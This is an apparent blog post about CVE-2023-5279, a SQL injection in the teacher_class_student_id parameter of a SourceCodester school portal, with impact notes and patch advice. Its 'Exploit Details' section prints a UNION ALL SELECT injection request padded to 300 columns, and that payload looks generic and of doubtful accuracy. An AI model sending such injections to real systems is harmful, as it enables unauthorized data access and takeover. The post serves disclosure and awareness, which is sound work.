Hey folks! Today, I want to talk about an important security issue that has come to light. A critical vulnerability has been discovered in SourceCodester Engineers Online Portal 1., and it's a big one. CVE-2023-5279, a SQL injection vulnerability, affects an unknown functionality of the file my_classmates.php. The manipulation of the argument "teacher_class_student_id" can result in unauthorized access to sensitive data or even allow an attacker to take control of the affected system.

This vulnerability has a severity rating of 9.8/10, making it an extremely serious issue that should not be taken lightly. For your convenience, I've included some additional resources at the end of this post to help you keep your systems secure.

But first, let's take a deeper look into what this vulnerability entails and how it can be exploited.

Exploit Details

This vulnerability is due to the way the application handles user-supplied input when processing the "teacher_class_student_id" argument in the "my_classmates.php" file. By injecting malicious SQL code, an attacker can manipulate the system's underlying database, which can result in unauthorized access to sensitive information or even allow the attacker to execute arbitrary commands on the affected system.

Here's a sample of the exploit code that demonstrates the potential danger posed by this vulnerability:

GET /engineers_online_portal/my_classmates.php?teacher_class_student_id=-1 UNION ALL SELECT
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,
35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,
65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,
95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,
118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,
139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,
160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,
181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,
203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,
225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,240,241,242,243,244,245,246,
247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,262,263,264,265,266,267,268,
269,270,271,272,273,274,275,276,277,278,279,280,281,282,283,284,285,286,287,288,289,290,
291,292,293,294,295,296,297,298,299,300--

Impact

The impact of this vulnerability is widespread and could potentially lead to devastating consequences if left unaddressed. An attacker could gain unauthorized access to sensitive data, modify or delete records in the database, or execute arbitrary commands on the affected system. This vulnerability could be exploited by anyone with network access to the affected application, making it essential for administrators to patch their systems as soon as possible.

For more information on CVE-2023-5279, please check out these resources

- CVE-2023-5279 Overview
- Vulnerability Database (VDB) Entry
- SourceCodester Engineers Online Portal Homepage

Stay safe, everyone! Remember to always keep your systems updated and stay informed about security threats to ensure the protection of your data and the integrity of your applications.

Timeline

Published on: 09/29/2023 18:15:10 UTC
Last modified on: 11/07/2023 04:23:46 UTC